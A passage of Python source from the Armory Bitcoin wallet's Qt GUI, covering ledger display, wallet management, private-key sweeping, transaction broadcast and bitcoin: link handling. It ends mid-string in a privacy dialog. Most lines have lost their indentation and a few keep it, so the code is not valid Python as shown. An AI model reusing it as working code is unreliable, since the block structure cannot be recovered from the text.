self.ledgerSize = len(self.combinedLedger)
# Many MainWindow objects haven't been created yet...
# let's try to update them and fail silently if they don't exist
try:
if bdmState in (BDM_OFFLINE, BDM_SCANNING):
self.lblTotalFunds.setText( '-'*12 )
self.lblSpendFunds.setText( '-'*12 )
self.lblUnconfFunds.setText('-'*12 )
return
uncolor = htmlColor('MoneyNeg') if unconfFunds>0 else htmlColor('Foreground')
btccolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('MoneyPos')
lblcolor = htmlColor('DisableFG') if spendFunds==totalFunds else htmlColor('Foreground')
goodColor= htmlColor('TextGreen')
self.lblTotalFunds.setText( '<b><font color="%s">%s</font></b>' % (btccolor,coin2str(totalFunds)))
self.lblTot.setText('<b><font color="%s">Maximum Funds:</font></b>' % lblcolor)
self.lblBTC1.setText('<b><font color="%s">BTC</font></b>' % lblcolor)
self.lblSpendFunds.setText( '<b><font color=%s>%s</font></b>' % (goodColor, coin2str(spendFunds)))
self.lblUnconfFunds.setText('<b><font color="%s">%s</font></b>' % \
(uncolor, coin2str(unconfFunds)))
if resetMainLedger == False:
self.ledgerModel.reset()
else:
self.ledgerView.goToTop()
      except AttributeError:
         # Some widgets may not exist yet during startup; fail silently,
         # as described above
         pass
if not self.usermode==USERMODE.Expert:
return
# In expert mode, we're updating the lockbox info, too
try:
self.lockboxLedgModel.reset()
except:
LOGEXCEPT('Failed to update lockbox ledger')
#############################################################################
def getCommentForLockboxTx(self, lboxId, le):
commentSet = set([])
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
for a160 in lbox.a160List:
wltID = self.getWalletForAddr160(a160)
if wltID:
commentSet.add(self.walletMap[wltID].getCommentForLE(le))
return ' '.join(commentSet)
#############################################################################
def convertLedgerToTable(self, ledger, showSentToSelfAmt=True, wltIDIn=None):
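      """
      Flatten LedgerEntry objects into a 2D table for the ledger model. Each
      row is: [nConf, unixTime, dateStr, signedAmountStr, wltName, comment,
      amountStr, isWatchOnly, wltID, txHashHex, isCoinbase, isSentToSelf],
      matching the column comments below.
      """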
table2D = []
datefmt = self.getPreferredDateFormat()
for le in ledger:
if wltIDIn is None:
wltID = le.getWalletID()
else:
wltID = wltIDIn
row = []
wlt = self.walletMap.get(wltID)
if wlt:
isWatch = (determineWalletType(wlt, self)[0] == WLTTYPES.WatchOnly)
wltName = wlt.labelName
dispComment = self.getCommentForLE(le, wltID)
else:
lboxId = wltID
lbox = self.getLockboxByID(lboxId)
if not lbox:
continue
isWatch = True
wltName = '%s-of-%s: %s (%s)' % (lbox.M, lbox.N, lbox.shortName, lboxId)
dispComment = self.getCommentForLockboxTx(lboxId, le)
nConf = TheBDM.getTopBlockHeight() - le.getBlockNum()+1
if le.getBlockNum()>=0xffffffff:
nConf=0
# If this was sent-to-self... we should display the actual specified
# value when the transaction was executed. This is pretty difficult
      # when "recipient" and "change" are indistinguishable... but
      # they're actually not, because we ALWAYS generate a new address
      # for change, which means the change address MUST have a higher
      # chain index
amt = le.getValue()
if le.isSentToSelf() and wlt and showSentToSelfAmt:
amt = determineSentToSelfAmt(le, wlt)[0]
# NumConf
row.append(nConf)
# UnixTime (needed for sorting)
row.append(le.getTxTime())
# Date
row.append(unixTimeToFormatStr(le.getTxTime(), datefmt))
# TxDir (actually just the amt... use the sign of the amt to determine dir)
row.append(coin2str(le.getValue(), maxZeros=2))
# Wlt Name
row.append(wltName)
# Comment
row.append(dispComment)
# Amount
row.append(coin2str(amt, maxZeros=2))
# Is this money mine?
row.append(isWatch)
# ID to display (this might be the lockbox ID)
row.append( wltID )
# TxHash
row.append( binary_to_hex(le.getTxHash() ))
# Is this a coinbase/generation transaction
row.append( le.isCoinbase() )
# Sent-to-self
row.append( le.isSentToSelf() )
# Finally, attach the row to the table
table2D.append(row)
return table2D
#############################################################################
def walletListChanged(self):
self.walletModel.reset()
self.populateLedgerComboBox()
self.changeWltFilter()
#############################################################################
def populateLedgerComboBox(self):
self.comboWltSelect.clear()
self.comboWltSelect.addItem( 'My Wallets' )
self.comboWltSelect.addItem( 'Offline Wallets' )
self.comboWltSelect.addItem( 'Other\'s wallets' )
self.comboWltSelect.addItem( 'All Wallets' )
self.comboWltSelect.addItem( 'Custom Filter' )
for wltID in self.walletIDList:
self.comboWltSelect.addItem( self.walletMap[wltID].labelName )
self.comboWltSelect.insertSeparator(5)
self.comboWltSelect.insertSeparator(5)
comboIdx = self.getSettingOrSetDefault('LastFilterState', 0)
self.comboWltSelect.setCurrentIndex(comboIdx)
#############################################################################
def execDlgWalletDetails(self, index=None):
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You currently do not have any wallets. Would you like to '
'create one, now?', QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
if index==None:
index = self.walletsView.selectedIndexes()
if len(self.walletMap)==1:
self.walletsView.selectRow(0)
index = self.walletsView.selectedIndexes()
elif len(index)==0:
QMessageBox.warning(self, 'Select a Wallet', \
'Please select a wallet on the right, to see its properties.', \
QMessageBox.Ok)
return
index = index[0]
wlt = self.walletMap[self.walletIDList[index.row()]]
dialog = DlgWalletDetails(wlt, self.usermode, self, self)
self.walletDialogDict[wlt.uniqueIDB58] = dialog
dialog.exec_()
if wlt.uniqueIDB58 in self.walletDialogDict:
del self.walletDialogDict[wlt.uniqueIDB58]
#############################################################################
def execClickRow(self, index=None):
row,col = index.row(), index.column()
if not col==WLTVIEWCOLS.Visible:
return
wltID = self.walletIDList[row]
currEye = self.walletVisibleList[row]
self.walletVisibleList[row] = not currEye
self.setWltSetting(wltID, 'LedgerShow', not currEye)
if TheBDM.getState()==BDM_BLOCKCHAIN_READY:
self.changeWltFilter()
#############################################################################
def updateTxCommentFromView(self, view):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, LEDGERCOLS.Comment).data().toString())
wltID = str(view.model().index(row, LEDGERCOLS.WltID ).data().toString())
txHash = str(view.model().index(row, LEDGERCOLS.TxHash ).data().toString())
dialog = DlgSetComment(self, self, currComment, 'Transaction')
if dialog.exec_():
newComment = str(dialog.edtComment.text())
self.walletMap[wltID].setComment(hex_to_binary(txHash), newComment)
self.walletListChanged()
#############################################################################
def updateAddressCommentFromView(self, view, wlt):
index = view.selectedIndexes()[0]
row, col = index.row(), index.column()
currComment = str(view.model().index(row, ADDRESSCOLS.Comment).data().toString())
addrStr = str(view.model().index(row, ADDRESSCOLS.Address).data().toString())
dialog = DlgSetComment(self, self, currComment, 'Address')
if dialog.exec_():
newComment = str(dialog.edtComment.text())
atype, addr160 = addrStr_to_hash160(addrStr)
if atype==P2SHBYTE:
LOGWARN('Setting comment for P2SH address: %s' % addrStr)
wlt.setComment(addr160, newComment)
#############################################################################
def getAddrCommentIfAvailAll(self, txHash):
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
return ''
else:
appendedComments = []
for wltID,wlt in self.walletMap.iteritems():
cmt = wlt.getAddrCommentIfAvail(txHash)
if len(cmt)>0:
appendedComments.append(cmt)
return '; '.join(appendedComments)
#############################################################################
def getCommentForLE(self, le, wltID=None):
# Smart comments for LedgerEntry objects: get any direct comments ...
# if none, then grab the one for any associated addresses.
if wltID is None:
wltID = le.getWalletID()
return self.walletMap[wltID].getCommentForLE(le)
#############################################################################
def addWalletToApplication(self, newWallet, walletIsNew=False):
LOGINFO('addWalletToApplication')
newWallet.registerWallet(walletIsNew)
# Update the maps/dictionaries
newWltID = newWallet.uniqueIDB58
if self.walletMap.has_key(newWltID):
return
self.walletMap[newWltID] = newWallet
self.walletIndices[newWltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(newWltID)
self.walletIDList.append(newWltID)
showByDefault = (determineWalletType(newWallet, self)[0] != WLTTYPES.WatchOnly)
self.walletVisibleList.append(showByDefault)
self.setWltSetting(newWltID, 'LedgerShow', showByDefault)
self.walletListChanged()
self.mainWnd = self
#############################################################################
def removeWalletFromApplication(self, wltID):
LOGINFO('removeWalletFromApplication')
idx = -1
try:
idx = self.walletIndices[wltID]
except KeyError:
LOGERROR('Invalid wallet ID passed to "removeWalletFromApplication"')
raise WalletExistsError
self.walletMap[wltID].unregisterWallet()
del self.walletMap[wltID]
del self.walletIndices[wltID]
self.walletIDSet.remove(wltID)
del self.walletIDList[idx]
del self.walletVisibleList[idx]
# Reconstruct walletIndices
for i,wltID in enumerate(self.walletIDList):
self.walletIndices[wltID] = i
self.walletListChanged()
#############################################################################
def RecoverWallet(self):
DlgWltRecoverWallet(self, self).promptWalletRecovery()
#############################################################################
def createSweepAddrTx(self, sweepFromAddrObjList, sweepToScript):
"""
This method takes a list of addresses (likely just created from private
key data), finds all their unspent TxOuts, and creates a signed tx that
transfers 100% of the funds to the sweepTO160 address. It doesn't
actually execute the transaction, but it will return a broadcast-ready
PyTx object that the user can confirm. TxFee is automatically calc'd
and deducted from the output value, if necessary.
"""
LOGINFO('createSweepAddrTx')
if not isinstance(sweepFromAddrObjList, (list, tuple)):
sweepFromAddrObjList = [sweepFromAddrObjList]
addr160List = [a.getAddr160() for a in sweepFromAddrObjList]
utxoList = getUnspentTxOutsForAddr160List(addr160List)
if len(utxoList)==0:
return [None, 0, 0]
outValue = sumTxOutList(utxoList)
inputSide = []
for utxo in utxoList:
# The PyCreateAndSignTx method requires PyTx and PyBtcAddress objects
rawTx = TheBDM.bdv().getTxByHash(utxo.getTxHash()).serialize()
a160 = CheckHash160(utxo.getRecipientScrAddr())
for aobj in sweepFromAddrObjList:
if a160 == aobj.getAddr160():
pubKey = aobj.binPublicKey65.toBinStr()
txoIdx = utxo.getTxOutIndex()
inputSide.append(UnsignedTxInput(rawTx, txoIdx, None, pubKey))
break
minFee = calcMinSuggestedFees(utxoList, outValue, 0, 1)
if minFee > 0:
LOGDEBUG( 'Subtracting fee from Sweep-output')
outValue -= minFee
if outValue<=0:
return [None, outValue, minFee]
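# Illustrative numbers only: sweeping 0.50000000 BTC with a suggested
# minimum fee of 0.00010000 BTC leaves a single 0.49990000 BTC output;
# if the fee would consume the whole balance, the early return just
# above reports the (non-positive) outValue and the fee to the caller.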
# Creating the output list is pretty easy...
outputSide = []
outputSide.append(DecoratedTxOut(sweepToScript, outValue))
try:
# Make copies, destroy them in the finally clause
privKeyMap = {}
for addrObj in sweepFromAddrObjList:
scrAddr = SCRADDR_P2PKH_BYTE + addrObj.getAddr160()
privKeyMap[scrAddr] = addrObj.binPrivKey32_Plain.copy()
pytx = PyCreateAndSignTx(inputSide, outputSide, privKeyMap)
return (pytx, outValue, minFee)
finally:
for scraddr in privKeyMap:
privKeyMap[scraddr].destroy()
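# A minimal usage sketch (hypothetical names, not from the original
# call sites): sweeping one imported key into a known output script
# would look roughly like:
#
#   pytx, outVal, fee = self.createSweepAddrTx(importedAddrObj, outScript)
#   if pytx is not None and outVal > 0:
#      self.broadcastTransaction(pytx, dryRun=False)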
#############################################################################
def confirmSweepScan(self, pybtcaddrList, targAddr160):
LOGINFO('confirmSweepScan')
gt1 = len(self.sweepAfterScanList)>1
if len(self.sweepAfterScanList) > 0:
QMessageBox.critical(self, 'Already Sweeping',
'You are already in the process of scanning the blockchain for '
'the purposes of sweeping other addresses. You cannot initiate '
'sweeping new addresses until the current operation completes. '
'<br><br>'
'In the future, you may select "Multiple Keys" when entering '
'addresses to sweep. There is no limit on the number that can be '
'specified, but they must all be entered at once.', QMessageBox.Ok)
# Destroy the private key data
for addr in pybtcaddrList:
addr.binPrivKey32_Plain.destroy()
return False
confirmed=False
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
#LOGERROR('Somehow ended up at confirm-sweep while in offline mode')
#QMessageBox.info(self, 'Armory is Offline', \
#'Armory is currently in offline mode. You must be in online '
#'mode to initiate the sweep operation.')
nkey = len(self.sweepAfterScanList)
strPlur = 'addresses' if nkey>1 else 'address'
QMessageBox.information(self, 'Armory is Offline', \
'You have chosen to sweep %d %s, but Armory is currently '
'in offline mode. The sweep will be performed the next time you '
'go into online mode. You can initiate online mode (if available) '
'from the dashboard in the main window.' % (nkey,strPlur), QMessageBox.Ok)
confirmed=True
else:
msgConfirm = ( \
'Armory must scan the global transaction history in order to '
'find any bitcoins associated with the %s you supplied. '
'Armory will go into offline mode temporarily while the scan '
'is performed, and you will not have access to balances or be '
'able to create transactions. The scan may take several minutes.'
'<br><br>' % ('keys' if gt1 else 'key'))
if TheBDM.getState()==BDM_SCANNING:
msgConfirm += ( \
'There is currently another scan operation being performed. '
'Would you like to start the sweep operation after it completes? ')
elif TheBDM.getState()==BDM_BLOCKCHAIN_READY:
msgConfirm += ( \
'<b>Would you like to start the scan operation right now?</b>')
msgConfirm += ('<br><br>Clicking "No" will abort the sweep operation')
confirmed = QMessageBox.question(self, 'Confirm Rescan', msgConfirm, \
QMessageBox.Yes | QMessageBox.No)
if confirmed==QMessageBox.Yes:
for addr in pybtcaddrList:
TheBDM.registerImportedScrAddr(Hash160ToScrAddr(addr.getAddr160()))
self.sweepAfterScanList = pybtcaddrList
self.sweepAfterScanTarg = targAddr160
self.setDashboardDetails()
return True
#############################################################################
def finishSweepScan(self, wlt, sweepList, sweepAfterScanTarget):
LOGINFO('finishSweepScan')
self.sweepAfterScanList = []
#######################################################################
# The createSweepAddrTx method will return instantly because the blockchain
# has already been rescanned, as described above
targScript = scrAddr_to_script(SCRADDR_P2PKH_BYTE + sweepAfterScanTarget)
finishedTx, outVal, fee = self.createSweepAddrTx(sweepList, targScript)
gt1 = len(sweepList)>1
if finishedTx is None:
if (outVal,fee)==(0,0):
QMessageBox.critical(self, 'Nothing to do', \
'The private %s you have provided does not appear to contain '
'any funds. There is nothing to sweep.' % ('keys' if gt1 else 'key'), \
QMessageBox.Ok)
return
else:
pladdr = ('addresses' if gt1 else 'address')
QMessageBox.critical(self, 'Cannot sweep',\
'You cannot sweep the funds from the %s you specified, because '
'the transaction fee would be equal to or greater than the amount '
'swept.'
'<br><br>'
'<b>Balance of %s:</b> %s<br>'
'<b>Fee to sweep %s:</b> %s'
'<br><br>The sweep operation has been canceled.' % (pladdr, pladdr, \
coin2str(outVal+fee,maxZeros=0), pladdr, coin2str(fee,maxZeros=0)), \
QMessageBox.Ok)
LOGERROR('Sweep amount (%s) is less than fee needed for sweeping (%s)', \
coin2str(outVal+fee, maxZeros=0), coin2str(fee, maxZeros=0))
return
# Finally, if we got here, we're ready to broadcast!
if gt1:
dispIn = 'multiple addresses'
else:
dispIn = 'address <b>%s</b>' % sweepList[0].getAddrStr()
dispOut = 'wallet <b>"%s"</b> (%s) ' % (wlt.labelName, wlt.uniqueIDB58)
if DlgVerifySweep(dispIn, dispOut, outVal, fee).exec_():
self.broadcastTransaction(finishedTx, dryRun=False)
wlt.finishSweepScan(sweepList)
#############################################################################
def broadcastTransaction(self, pytx, dryRun=False):
if dryRun:
#DlgDispTxInfo(pytx, None, self, self).exec_()
return
else:
LOGRAWDATA(pytx.serialize(), logging.INFO)
LOGPPRINT(pytx, logging.INFO)
newTxHash = pytx.getHash()
LOGINFO('Sending Tx, %s', binary_to_hex(newTxHash))
self.NetworkingFactory.sendTx(pytx)
LOGINFO('Transaction sent to Satoshi client...!')
def sendGetDataMsg():
msg = PyMessage('getdata')
msg.payload.invList.append( [MSG_INV_TX, newTxHash] )
self.NetworkingFactory.sendMessage(msg)
def checkForTxInBDM():
# The sleep/delay makes sure we have time to receive a response
# but it also gives the user a chance to SEE the change to their
# balance occur. In some cases, that may be more satisfying than
# just seeing the updated balance when they get back to the main
# screen
if not TheBDM.bdv().getTxByHash(newTxHash).isInitialized():
LOGERROR('Transaction was not accepted by the Satoshi client')
LOGERROR('Raw transaction:')
LOGRAWDATA(pytx.serialize(), logging.ERROR)
LOGERROR('Transaction details')
LOGPPRINT(pytx, logging.ERROR)
searchstr = binary_to_hex(newTxHash, BIGENDIAN)
supportURL = 'https://bitcoinarmory.com/support'
blkexplURL = BLOCKEXPLORE_URL_TX % searchstr
blkexplURL_short = BLOCKEXPLORE_URL_TX % searchstr[:20]
QMessageBox.warning(self, tr('Transaction Not Accepted'), tr("""
The transaction that you just executed does not
appear to have been accepted by the Bitcoin network yet.
This can happen for a variety of reasons.
<br><br>On some occasions the transaction actually will succeed
and this message is displayed prematurely. To confirm whether
the transaction actually succeeded, you can try this direct link
to %(blockexplorer)s:
<br><br>
<a href="%(url)s">%(urlshort)s...</a>
<br><br>
If you do not see the
transaction on that webpage within one minute, it failed and you
should attempt to re-send it.
If it <i>does</i> show up, then you do not need to do anything
else -- it will show up in Armory as soon as it receives one
confirmation.
<br><br>If the transaction did fail, it is likely because the fee
is too low. Try again with a higher fee.
If the problem persists, go to "<i>Help</i>" and select
"<i>Submit Bug Report</i>". Or use "<i>File</i>" ->
"<i>Export Log File</i>" and then attach it to a support
ticket at
<a href="%(supporturl)s">%(supporturl)s</a>""") % {
'blockexplorer' : BLOCKEXPLORE_NAME, 'url' : blkexplURL, \
'urlshort' : blkexplURL_short, 'supporturl' : supportURL}, QMessageBox.Ok)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
# Send the Tx after a short delay, give the system time to see the Tx
# on the network and process it, and check to see if the Tx was seen.
# We may change this setup in the future, but for now....
reactor.callLater(3, sendGetDataMsg)
reactor.callLater(15, checkForTxInBDM)
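# Rough timeline, assuming the broadcast happens at t=0: the getdata
# probe is sent at t+3s, and checkForTxInBDM runs at t+15s, warning the
# user only if the transaction still isn't in the BDM by then.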
#############################################################################
def warnNoImportWhileScan(self):
extraMsg = ''
if not self.usermode==USERMODE.Standard:
extraMsg = ('<br><br>' + \
tr('In the future, you may avoid scanning twice by '
'starting Armory in offline mode (--offline), and '
'perform the import before switching to online mode.'))
QMessageBox.warning(self, tr('Armory is Busy'), \
tr('Wallets and addresses cannot be imported while Armory is in '
'the middle of an existing blockchain scan. Please wait for '
'the scan to finish. ') + extraMsg, QMessageBox.Ok)
#############################################################################
def execImportWallet(self):
sdm = TheSDM.getSDMState()
bdm = TheBDM.getState()
if sdm in ['BitcoindInitializing', \
'BitcoindSynchronizing', \
'TorrentSynchronizing'] or \
bdm in [BDM_SCANNING]:
QMessageBox.warning(self, tr('Scanning'), tr("""
Armory is currently in the middle of scanning the blockchain for
your existing wallets. New wallets cannot be imported until this
operation is finished."""), QMessageBox.Ok)
return
DlgUniversalRestoreSelect(self, self).exec_()
#############################################################################
def execGetImportWltName(self):
fn = self.getFileLoad('Import Wallet File')
if not os.path.exists(fn):
return
wlt = PyBtcWallet().readWalletFile(fn, verifyIntegrity=False)
wltID = wlt.uniqueIDB58
wlt = None
if self.walletMap.has_key(wltID):
QMessageBox.warning(self, 'Duplicate Wallet!', \
'You selected a wallet that has the same ID as one you already '
'have loaded (%s)! If you would like to import it anyway, '
'please delete the duplicate wallet in Armory first.'%wltID, \
QMessageBox.Ok)
return
fname = self.getUniqueWalletFilename(fn)
newpath = os.path.join(ARMORY_HOME_DIR, fname)
LOGINFO('Copying imported wallet to: %s', newpath)
shutil.copy(fn, newpath)
newWlt = PyBtcWallet().readWalletFile(newpath)
newWlt.fillAddressPool()
self.addWalletToApplication(newWlt)
#############################################################################
def digitalBackupWarning(self):
reply = QMessageBox.warning(self, 'Be Careful!', tr("""
<font color="red"><b>WARNING:</b></font> You are about to make an
<u>unencrypted</u> backup of your wallet. It is highly recommended
that you do <u>not</u> ever save unencrypted wallets to your regular
hard drive. This feature is intended for saving to a USB key or
other removable media."""), QMessageBox.Ok | QMessageBox.Cancel)
return (reply==QMessageBox.Ok)
#############################################################################
def execAddressBook(self):
if TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, 'Blockchain Not Ready', \
'The address book is created from transaction data available in '
'the blockchain, which has not finished loading. The address '
'book will become available when Armory is online.', QMessageBox.Ok)
elif TheBDM.getState() in (BDM_UNINITIALIZED,BDM_OFFLINE):
QMessageBox.warning(self, 'Blockchain Not Ready', \
'The address book is created from transaction data available in '
'the blockchain, but Armory is currently offline. The address '
'book will become available when Armory is online.', QMessageBox.Ok)
else:
if len(self.walletMap)==0:
QMessageBox.warning(self, 'No wallets!', 'You have no wallets so '
'there is no address book to display.', QMessageBox.Ok)
return
DlgAddressBook(self, self, None, None, None).exec_()
#############################################################################
def getUniqueWalletFilename(self, wltPath):
root,fname = os.path.split(wltPath)
base,ext = os.path.splitext(fname)
if not ext=='.wallet':
fname = base+'.wallet'
currHomeList = os.listdir(ARMORY_HOME_DIR)
newIndex = 2
while fname in currHomeList:
# If we already have a wallet by this name, must adjust name
base,ext = os.path.splitext(fname)
fname='%s_%02d.wallet'%(base, newIndex)
newIndex+=1
if newIndex==99:
raise WalletExistsError('Cannot find unique filename for wallet. '
'Too many duplicates!')
return fname
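# Example of the renaming scheme (hypothetical filename): if
# 'armory_ABC123.wallet' already exists, the copy becomes
# 'armory_ABC123_02.wallet'. Note the index is appended to the current
# candidate name on each pass, so repeated collisions compound the
# suffix rather than simply incrementing it.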
#############################################################################
def addrViewDblClicked(self, index, wlt):
uacfv = lambda x: self.updateAddressCommentFromView(self.wltAddrView, self.wlt)
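# NOTE: this lambda is assigned but never connected to a signal or
# returned, so this double-click handler is effectively a no-op as
# written.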
#############################################################################
def dblClickLedger(self, index):
if index.column()==LEDGERCOLS.Comment:
self.updateTxCommentFromView(self.ledgerView)
else:
self.showLedgerTx()
#############################################################################
def showLedgerTx(self):
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
txtime = unicode(self.ledgerView.model().index(row, LEDGERCOLS.DateStr).data().toString())
pytx = None
txHashBin = hex_to_binary(txHash)
cppTx = TheBDM.bdv().getTxByHash(txHashBin)
if cppTx.isInitialized():
pytx = PyTx().unserialize(cppTx.serialize())
if pytx is None:
QMessageBox.critical(self, 'Invalid Tx',
'The transaction you requested be displayed does not exist in '
'Armory\'s database. This is unusual...', QMessageBox.Ok)
return
DlgDispTxInfo( pytx, self.walletMap[wltID], self, self, txtime=txtime).exec_()
#############################################################################
def showContextMenuLedger(self):
menu = QMenu(self.ledgerView)
if len(self.ledgerView.selectedIndexes())==0:
return
row = self.ledgerView.selectedIndexes()[0].row()
txHash = str(self.ledgerView.model().index(row, LEDGERCOLS.TxHash).data().toString())
txHash = hex_switchEndian(txHash)
wltID = str(self.ledgerView.model().index(row, LEDGERCOLS.WltID).data().toString())
actViewTx = menu.addAction("View Details")
actViewBlkChn = menu.addAction("View on %s" % BLOCKEXPLORE_NAME)
actComment = menu.addAction("Change Comment")
actCopyTxID = menu.addAction("Copy Transaction ID")
actOpenWallet = menu.addAction("Open Relevant Wallet")
action = menu.exec_(QCursor.pos())
if action==actViewTx:
self.showLedgerTx()
elif action==actViewBlkChn:
try:
webbrowser.open(BLOCKEXPLORE_URL_TX % txHash)
except:
LOGEXCEPT('Failed to open webbrowser')
QMessageBox.critical(self, 'Could not open browser', \
'Armory encountered an error opening your web browser. To view '
'this transaction on blockchain.info, please copy and paste '
'the following URL into your browser: '
'<br><br>%s' % (BLOCKEXPLORE_URL_TX % txHash), QMessageBox.Ok)
elif action==actCopyTxID:
clipb = QApplication.clipboard()
clipb.clear()
clipb.setText(txHash)
elif action==actComment:
self.updateTxCommentFromView(self.ledgerView)
elif action==actOpenWallet:
DlgWalletDetails(self.getSelectedWallet(), self.usermode, self, self).exec_()
#############################################################################
def getSelectedWallet(self):
wltID = None
if len(self.walletMap) > 0:
wltID = self.walletMap.keys()[0]
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect) > 0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
# Starting the send dialog with or without a wallet
return None if wltID is None else self.walletMap[wltID]
#############################################################################
def clickSendBitcoins(self):
if TheBDM.getState() in (BDM_OFFLINE, BDM_UNINITIALIZED):
QMessageBox.warning(self, 'Offline Mode', \
'Armory is currently running in offline mode, and has no '
'ability to determine balances or create transactions. '
'<br><br>'
'In order to send coins from this wallet you must use a '
'full copy of this wallet from an online computer, '
'or initiate an "offline transaction" using a watching-only '
'wallet on an online computer.', QMessageBox.Ok)
return
elif TheBDM.getState()==BDM_SCANNING:
QMessageBox.warning(self, 'Armory Not Ready', \
'Armory is currently scanning the blockchain to collect '
'the information needed to create transactions. This typically '
'takes between one and five minutes. Please wait until your '
'balance appears on the main window, then try again.', \
QMessageBox.Ok)
return
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You cannot send any bitcoins until you create a wallet and '
'receive some coins. Would you like to create a wallet?', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self).exec_()
#############################################################################
def uriSendBitcoins(self, uriDict):
# Because Bitcoin-Qt doesn't store the message= field we have to assume
# that the label field holds the Tx-info. So we concatenate them for
# the display message
uri_has = lambda s: uriDict.has_key(s)
haveLbl = uri_has('label')
haveMsg = uri_has('message')
newMsg = ''
if haveLbl and haveMsg:
newMsg = uriDict['label'] + ': ' + uriDict['message']
elif not haveLbl and haveMsg:
newMsg = uriDict['message']
elif haveLbl and not haveMsg:
newMsg = uriDict['label']
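# For example (hypothetical URI fields): label='Donation' and
# message='Thanks!' combine into 'Donation: Thanks!'; if only one of
# the two is present, it is used as-is.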
descrStr = ''
descrStr = ('You just clicked on a "bitcoin:" link requesting bitcoins '
'to be sent to the following address:<br> ')
descrStr += '<br>--<b>Address</b>:\t%s ' % uriDict['address']
#if uri_has('label'):
#if len(uriDict['label'])>30:
#descrStr += '(%s...)' % uriDict['label'][:30]
#else:
#descrStr += '(%s)' % uriDict['label']
amt = 0
if uri_has('amount'):
amt = uriDict['amount']
amtstr = coin2str(amt, maxZeros=1)
descrStr += '<br>--<b>Amount</b>:\t%s BTC' % amtstr
if newMsg:
if len(newMsg)>60:
descrStr += '<br>--<b>Message</b>:\t%s...' % newMsg[:60]
else:
descrStr += '<br>--<b>Message</b>:\t%s' % newMsg
uriDict['message'] = newMsg
if not uri_has('amount'):
descrStr += ('<br><br>There is no amount specified in the link, so '
'you can decide the amount after selecting a wallet to use '
'for this transaction. ')
else:
descrStr += ('<br><br><b>The specified amount <u>can</u> be changed</b> on the '
'next screen before hitting the "Send" button. ')
selectedWalletID = None
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You just clicked on a "bitcoin:" link to send money, but you '
'currently have no wallets! Would you like to create a wallet '
'now?', QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return False
else:
DlgSendBitcoins(self.getSelectedWallet(), self, self, uriDict).exec_()
return True
#############################################################################
def clickReceiveCoins(self):
loading = None
QAPP.processEvents()
wltID = None
selectionMade = True
if len(self.walletMap)==0:
reply = QMessageBox.information(self, 'No Wallets!', \
'You have not created any wallets which means there is nowhere to '
'store your bitcoins! Would you like to create a wallet now?', \
QMessageBox.Yes | QMessageBox.No)
if reply==QMessageBox.Yes:
self.startWalletWizard()
return
elif len(self.walletMap)==1:
loading = LoadingDisp(self, self)
loading.show()
wltID = self.walletMap.keys()[0]
else:
wltSelect = self.walletsView.selectedIndexes()
if len(wltSelect)>0:
row = wltSelect[0].row()
wltID = str(self.walletsView.model().index(row, WLTVIEWCOLS.ID).data().toString())
dlg = DlgWalletSelect(self, self, 'Receive coins with wallet...', '', \
firstSelect=wltID, onlyMyWallets=False)
if dlg.exec_():
loading = LoadingDisp(self, self)
loading.show()
wltID = dlg.selectedID
else:
selectionMade = False
if selectionMade:
wlt = self.walletMap[wltID]
wlttype = determineWalletType(wlt, self)[0]
if showRecvCoinsWarningIfNecessary(wlt, self, self):
QAPP.processEvents()
dlg = DlgNewAddressDisp(wlt, self, self, loading)
dlg.exec_()
#############################################################################
def sysTrayActivated(self, reason):
if reason==QSystemTrayIcon.DoubleClick:
self.bringArmoryToFront()
#############################################################################
def bringArmoryToFront(self):
self.show()
self.setWindowState(Qt.WindowActive)
self.activateWindow()
self.raise_()
#############################################################################
def minimizeArmory(self):
LOGDEBUG('Minimizing Armory')
self.hide()
self.sysTray.show()
#############################################################################
def startWalletWizard(self):
walletWizard = WalletWizard(self, self)
walletWizard.exec_()
#############################################################################
def startTxWizard(self, prefill=None, onlyOfflineWallets=False):
txWizard = TxWizard(self, self, self.getSelectedWallet(), prefill, onlyOfflineWallets=onlyOfflineWallets)
txWizard.exec_()
#############################################################################
def exportLogFile(self):
LOGDEBUG('exportLogFile')
reply = QMessageBox.warning(self, tr('Bug Reporting'), tr("""<qt>
As of version 0.91, Armory now includes a form for reporting
problems with the software. Please use
<i>"Help"</i>→<i>"Submit Bug Report"</i>
to send a report directly to the Armory team, which will include
your log file automatically.</qt>"""), QMessageBox.Ok | QMessageBox.Cancel)
if not reply==QMessageBox.Ok:
return
if self.logFilePrivacyWarning(wCancel=True):
self.saveCombinedLogFile()
#############################################################################
def getUserAgreeToPrivacy(self, getAgreement=False):
ptype = 'submitbug' if getAgreement else 'generic'
dlg = DlgPrivacyPolicy(self, self, ptype)
if not dlg.exec_():
return False
return dlg.chkUserAgrees.isChecked()
#############################################################################
def logFileTriplePrivacyWarning(self):
return MsgBoxCustom(MSGBOX.Warning, tr('Privacy Warning'), tr("""
<b><u><font size=4>ATI Privacy Policy</font></u></b>
<br><br>
You should review the <a href="%s">Armory Technologies, Inc. privacy
policy</a> before sending any data to ATI servers.
<br><br>
<b><u><font size=3>Wallet Analysis Log Files</font></u></b>
<br><br>
The wallet analysis logs contain no personally-identifiable
information, only a record of errors and inconsistencies
found in your wallet file. No private keys or even public
keys are included.
<br><br>
